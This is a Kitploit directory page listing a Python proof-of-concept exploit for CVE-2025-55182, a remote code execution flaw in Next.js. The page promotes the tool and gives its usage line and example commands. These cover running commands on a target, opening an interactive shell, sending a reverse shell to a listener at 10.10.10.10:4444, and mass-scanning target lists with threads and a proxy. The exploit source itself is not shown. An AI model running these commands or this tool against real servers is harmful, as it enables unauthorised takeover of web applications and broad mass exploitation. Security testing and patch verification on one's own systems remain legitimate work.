Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
POC-CVE-2025-55182 — Python exploit for CVE-2025-55182 targeting Next.js RCE with single-target, mass scanning, interactive shell, and reverse shell capabilities. | Kitploit
Tools/GitHubGitHub/imbas007/poc-cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubimbas007/poc-cve-2025-55182

POC-CVE-2025-55182

Python exploit for CVE-2025-55182 targeting Next.js RCE with single-target, mass scanning, interactive shell, and reverse shell capabilities.

View Repository
119 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

POC-CVE-2025-55182

credit : https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

root@kitploit:~

usage: CVE-2025-55182-Exp.py [-h] [-u URL] [-l LIST] [-c COMMAND] [-i] [--revshell LHOST LPORT] [-t THREADS] [--proxy PROXY] [--timeout TIMEOUT] [-v]

Usage

root@kitploit:~
# Single target exploit
  python3 CVE-2025-55182-Exp.py -u http://target:3000 -c "id"
  
  # Interactive shell
  python3 CVE-2025-55182-Exp.py -u http://target:3000 -i
  
  # Reverse shell
  python3 CVE-2025-55182-Exp.py -u http://target:3000 --revshell 10.10.10.10 4444
  
  # Mass scan from file
  python3 CVE-2025-55182-Exp.py -l targets.txt -c "whoami" -t 10
  
  # With proxy
  python3 CVE-2025-55182-Exp.py -u http://target:3000 -c "id" --proxy http://127.0.0.1:8080

Download Tool